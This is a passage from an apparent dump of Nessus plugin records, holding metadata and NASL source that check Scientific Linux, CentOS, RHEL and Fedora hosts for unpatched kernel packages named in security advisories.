get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-common-i686-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-754.29.1.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:00", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:1524 advisory.\n\n - kernel: offset2lib allows for the stack guard page to be jumped over (CVE-2017-1000371)\n\n - kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain upper-bound check, leading to a buffer overflow (CVE-2019-17666)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-28T00:00:00", "type": "nessus", "title": "CentOS 6 : kernel (CESA-2020:1524) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000371", "CVE-2019-17666"], "modified": "2020-06-05T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2020-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/136020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:1524 and \n# CentOS Errata and Security Advisory 2020:1524 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136020);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/05\");\n\n script_cve_id(\"CVE-2017-1000371\", \"CVE-2019-17666\");\n script_xref(name:\"RHSA\", value:\"2020:1524\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2020:1524) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:1524 advisory.\n\n - kernel: offset2lib allows for the stack guard page to be\n jumped over (CVE-2017-1000371)\n\n - kernel: rtl_p2p_noa_ie in\n drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux\n kernel lacks a certain upper-bound check, leading to a\n buffer overflow (CVE-2019-17666)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2020-April/035703.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c141be78\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17666\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-754.29.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-754.29.1.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:10:37", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:1524 advisory.\n\n - kernel: offset2lib allows for the stack guard page to be jumped over (CVE-2017-1000371)\n\n - kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain upper-bound check, leading to a buffer overflow (CVE-2019-17666)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-22T00:00:00", "type": "nessus", "title": "RHEL 6 : kernel (RHSA-2020:1524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000371", "CVE-2019-17666"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_els:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:python-perf"], "id": "REDHAT-RHSA-2020-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/135910", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1524. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135910);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2017-1000371\", \"CVE-2019-17666\");\n script_bugtraq_id(99131);\n script_xref(name:\"RHSA\", value:\"2020:1524\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2020:1524)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:1524 advisory.\n\n - kernel: offset2lib allows for the stack guard page to be jumped over (CVE-2017-1000371)\n\n - kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain\n upper-bound check, leading to a buffer overflow (CVE-2019-17666)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-1000371\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-17666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:1524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1462158\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1763690\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17666\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 120);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n var cve_list = make_list('CVE-2017-1000371', 'CVE-2019-17666');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2020:1524');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/power/6/6Server/ppc64/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/os',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/os',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/os',\n 'content/fastrack/rhel/power/6/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/os',\n 'content/fastrack/rhel/power/6/ppc64/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/os',\n 'content/fastrack/rhel/system-z/6/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/os',\n 'content/fastrack/rhel/system-z/6/s390x/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'kernel-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-abi-whitelists-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-bootwrapper-2.6.32-754.29.1.el6', 'cpu':'ppc64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-devel-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-devel-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-firmware-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-headers-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-2.6.32-754.29.1.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-devel-2.6.32-754.29.1.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-bootwrapper / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:28", "description": "The 3.15.4 stable update contains a number of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-07-11T00:00:00", "type": "nessus", "title": "Fedora 20 : kernel-3.15.4-200.fc20 (2014-8171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4699", "CVE-2014-4715"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-8171.NASL", "href": "https://www.tenable.com/plugins/nessus/76468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-8171.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76468);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4715\");\n script_bugtraq_id(68349, 68411);\n script_xref(name:\"FEDORA\", value:\"2014-8171\");\n\n script_name(english:\"Fedora 20 : kernel-3.15.4-200.fc20 (2014-8171)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.15.4 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1115767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1115927\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135290.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ab6dbb1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/11\");\n 